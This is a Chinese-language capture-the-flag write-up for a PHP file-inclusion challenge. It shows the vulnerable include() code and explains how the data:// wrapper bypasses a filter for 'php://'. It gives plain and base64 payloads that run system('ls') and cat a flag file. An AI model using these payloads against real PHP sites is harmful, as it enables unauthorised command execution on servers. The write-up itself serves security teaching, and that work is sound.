web4_Web_php_include
key:data://僞協議執行命令
①打開頁面還是那串代碼👇
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
$page=str_replace("php://", "", $page);
}
include($page);
?>
但是這次我們選擇另一種思路,另闢蹊徑
②在上一個wp中我們使用了大小寫巧妙繞過
假如題目使用了不區分大小寫的stristr()和str_ireplace(),我們又該怎麼辦呢?
我們可以使用另一種僞協議data://👇
👉直接形式
data://text/plain,<?php 執行內容 ?>
👉base64加密形式
data://text/plain;base64,執行內容加密後的代碼
因此可以類似上一個wp一樣構造system命令
GET傳參下列任何一個參數即可👇
直接形式
?page=data://text/plain,<?php system("ls")?>
加密形式
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=
執行情況👇
發現了目標文件fl4gisisish3r3.php
③用類似的辦法cat一下這個文件👇
直接形式
?page=data://text/plain,<?php system("cat fl4gisisish3r3.php")?>
加密形式
?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik/Pg==
執行後發現啥也沒有???
別急,flag藏在了源代碼裏👇